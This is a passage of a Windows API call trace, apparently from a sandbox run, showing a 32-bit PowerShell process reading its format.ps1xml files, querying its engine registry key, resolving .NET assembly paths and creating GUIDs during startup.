	[0224.580] ReadFile (in: hFile=0x32c, lpBuffer=0x2d636ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d636ac*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.580] GetLastError () returned 0x0
	[0224.580] ReadFile (in: hFile=0x32c, lpBuffer=0x2d636ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d636ac*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.580] GetLastError () returned 0x0
	[0224.581] ReadFile (in: hFile=0x32c, lpBuffer=0x2d636ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d636ac*, lpNumberOfBytesRead=0xae9b4*=0xfb2, lpOverlapped=0x0) returned 1
	[0224.581] GetLastError () returned 0x0
	[0224.581] ReadFile (in: hFile=0x32c, lpBuffer=0x2d62dfe, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d62dfe*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0224.581] GetLastError () returned 0x0
	[0224.581] ReadFile (in: hFile=0x32c, lpBuffer=0x2d636ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d636ac*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0224.581] GetLastError () returned 0x0
	[0224.582] CloseHandle (hObject=0x32c) returned 1
	[0224.582] GetLastError () returned 0x0
	[0224.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.582] GetLastError () returned 0x0
	[0224.582] SetErrorMode (uMode=0x1) returned 0x1
	[0224.582] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d83f3c | out: lpFileInformation=0x2d83f3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0224.582] GetLastError () returned 0x0
	[0224.582] SetErrorMode (uMode=0x1) returned 0x1
	[0224.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.582] GetLastError () returned 0x0
	[0224.582] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae938 | out: phkResult=0xae938*=0x32c) returned 0x0
	[0224.583] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x0, lpcbData=0xae97c*=0x0 | out: lpType=0xae980*=0x1, lpData=0x0, lpcbData=0xae97c*=0x56) returned 0x0
	[0224.583] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x3582a0, lpcbData=0xae97c*=0x56 | out: lpType=0xae980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae97c*=0x56) returned 0x0
	[0224.583] RegCloseKey (hKey=0x32c) returned 0x0
	[0224.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.583] GetLastError () returned 0x0
	[0224.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.583] GetLastError () returned 0x0
	[0224.585] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xe873fddf, Data2=0xec41, Data3=0x47f0, Data4=([0]=0xb1, [1]=0x7d, [2]=0xd, [3]=0x1d, [4]=0xea, [5]=0x41, [6]=0x37, [7]=0xcd))) returned 0x0
	[0224.594] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xd157b1a0, Data2=0x6179, Data3=0x4364, Data4=([0]=0x8d, [1]=0x12, [2]=0x3, [3]=0x8b, [4]=0x61, [5]=0xf6, [6]=0x93, [7]=0x70))) returned 0x0
	[0224.596] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x40121565, Data2=0xf51e, Data3=0x4aa5, Data4=([0]=0x96, [1]=0x51, [2]=0x81, [3]=0x49, [4]=0xbb, [5]=0x66, [6]=0x46, [7]=0x6d))) returned 0x0
	[0224.596] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x413ec52b, Data2=0x64f2, Data3=0x4b3b, Data4=([0]=0xaf, [1]=0x62, [2]=0xcf, [3]=0x56, [4]=0x59, [5]=0xf8, [6]=0x19, [7]=0x6e))) returned 0x0
	[0224.596] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xe1f5c8f7, Data2=0x8a2e, Data3=0x493c, Data4=([0]=0xaa, [1]=0x25, [2]=0x9c, [3]=0x8d, [4]=0xc6, [5]=0xfa, [6]=0x86, [7]=0x57))) returned 0x0
	[0224.596] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x56bcb9c2, Data2=0x483a, Data3=0x4703, Data4=([0]=0x88, [1]=0xe5, [2]=0x5d, [3]=0xce, [4]=0x2, [5]=0xfe, [6]=0x1e, [7]=0x42))) returned 0x0
	[0224.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.597] GetLastError () returned 0x0
	[0224.597] SetErrorMode (uMode=0x1) returned 0x1
	[0224.597] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0224.597] GetLastError () returned 0x0
	[0224.597] GetFileType (hFile=0x32c) returned 0x1
	[0224.597] SetErrorMode (uMode=0x1) returned 0x1
	[0224.597] GetFileType (hFile=0x32c) returned 0x1
	[0224.597] ReadFile (in: hFile=0x32c, lpBuffer=0x2da38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2da38e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.598] GetLastError () returned 0x0
	[0224.599] ReadFile (in: hFile=0x32c, lpBuffer=0x2da38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2da38e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.599] GetLastError () returned 0x0
	[0224.599] ReadFile (in: hFile=0x32c, lpBuffer=0x2da38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2da38e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.599] GetLastError () returned 0x0
	[0224.600] ReadFile (in: hFile=0x32c, lpBuffer=0x2da38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2da38e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.600] GetLastError () returned 0x0
	[0224.601] ReadFile (in: hFile=0x32c, lpBuffer=0x2da38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2da38e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.601] GetLastError () returned 0x0
	[0224.601] ReadFile (in: hFile=0x32c, lpBuffer=0x2da38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2da38e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.601] GetLastError () returned 0x0
	[0224.601] ReadFile (in: hFile=0x32c, lpBuffer=0x2da38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2da38e4*, lpNumberOfBytesRead=0xae9b4*=0xaca, lpOverlapped=0x0) returned 1
	[0224.601] GetLastError () returned 0x0
	[0224.601] ReadFile (in: hFile=0x32c, lpBuffer=0x2da2f4e, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2da2f4e*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0224.601] GetLastError () returned 0x0
	[0224.601] ReadFile (in: hFile=0x32c, lpBuffer=0x2da38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2da38e4*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0224.601] GetLastError () returned 0x0
	[0224.601] CloseHandle (hObject=0x32c) returned 1
	[0224.601] GetLastError () returned 0x0
	[0224.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.602] GetLastError () returned 0x0
	[0224.602] SetErrorMode (uMode=0x1) returned 0x1
	[0224.602] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2dc48e0 | out: lpFileInformation=0x2dc48e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0224.602] GetLastError () returned 0x0
	[0224.602] SetErrorMode (uMode=0x1) returned 0x1
	[0224.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.602] GetLastError () returned 0x0
	[0224.602] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae938 | out: phkResult=0xae938*=0x32c) returned 0x0
	[0224.602] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x0, lpcbData=0xae97c*=0x0 | out: lpType=0xae980*=0x1, lpData=0x0, lpcbData=0xae97c*=0x56) returned 0x0
	[0224.602] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x3582a0, lpcbData=0xae97c*=0x56 | out: lpType=0xae980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae97c*=0x56) returned 0x0
	[0224.602] RegCloseKey (hKey=0x32c) returned 0x0
	[0224.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.603] GetLastError () returned 0x0
	[0224.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.603] GetLastError () returned 0x0
	[0224.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0224.715] GetLastError () returned 0x0
	[0224.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0224.718] GetLastError () returned 0x57
	[0224.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0224.727] GetLastError () returned 0x57
	[0224.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.733] GetLastError () returned 0x57
	[0224.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0224.735] GetLastError () returned 0x57
	[0224.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0224.737] GetLastError () returned 0x57
	[0224.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0224.738] GetLastError () returned 0x57
	[0224.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0224.738] GetLastError () returned 0x57
	[0224.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0224.739] GetLastError () returned 0x57
	[0224.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0224.740] GetLastError () returned 0x57
	[0224.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0224.741] GetLastError () returned 0x57
	[0224.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0224.743] GetLastError () returned 0x57
	[0224.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0224.744] GetLastError () returned 0x57
	[0224.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0224.744] GetLastError () returned 0x57
	[0224.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0224.745] GetLastError () returned 0x57
	[0224.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0224.746] GetLastError () returned 0x57
	[0224.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0224.746] GetLastError () returned 0x57
	[0224.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0224.747] GetLastError () returned 0x57
	[0224.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.747] GetLastError () returned 0x57
	[0224.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.747] GetLastError () returned 0x57
	[0224.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.747] GetLastError () returned 0x57
	[0224.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.748] GetLastError () returned 0x57
	[0224.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.749] GetLastError () returned 0x57
	[0225.009] VirtualQuery (in: lpAddress=0xad690, lpBuffer=0xae690, dwLength=0x1c | out: lpBuffer=0xae690*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.013] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xa907f004, Data2=0x82c3, Data3=0x4808, Data4=([0]=0xb6, [1]=0xb, [2]=0xe4, [3]=0xaf, [4]=0x9b, [5]=0x28, [6]=0x81, [7]=0x12))) returned 0x0
	[0225.014] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xddca0f60, Data2=0x8c5f, Data3=0x41e4, Data4=([0]=0x89, [1]=0x32, [2]=0x41, [3]=0xf0, [4]=0x96, [5]=0x75, [6]=0x42, [7]=0xf2))) returned 0x0
	[0225.015] VirtualQuery (in: lpAddress=0xad708, lpBuffer=0xae708, dwLength=0x1c | out: lpBuffer=0xae708*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.015] VirtualQuery (in: lpAddress=0xad708, lpBuffer=0xae708, dwLength=0x1c | out: lpBuffer=0xae708*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.015] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x8f98c54c, Data2=0x5fef, Data3=0x44d4, Data4=([0]=0x82, [1]=0xa7, [2]=0xc5, [3]=0x6b, [4]=0x1c, [5]=0x6f, [6]=0x24, [7]=0xae))) returned 0x0
	[0225.022] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x89792c66, Data2=0x52b, Data3=0x49f9, Data4=([0]=0x9d, [1]=0x56, [2]=0x6b, [3]=0x26, [4]=0xf3, [5]=0xb5, [6]=0x8f, [7]=0xe9))) returned 0x0
	[0225.022] VirtualQuery (in: lpAddress=0xad834, lpBuffer=0xae834, dwLength=0x1c | out: lpBuffer=0xae834*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.022] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.023] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.023] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x16ec4a24, Data2=0x51b, Data3=0x43bd, Data4=([0]=0x9d, [1]=0x15, [2]=0xf7, [3]=0x25, [4]=0xc, [5]=0x99, [6]=0x8b, [7]=0xc1))) returned 0x0
	[0225.023] VirtualQuery (in: lpAddress=0xad834, lpBuffer=0xae834, dwLength=0x1c | out: lpBuffer=0xae834*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
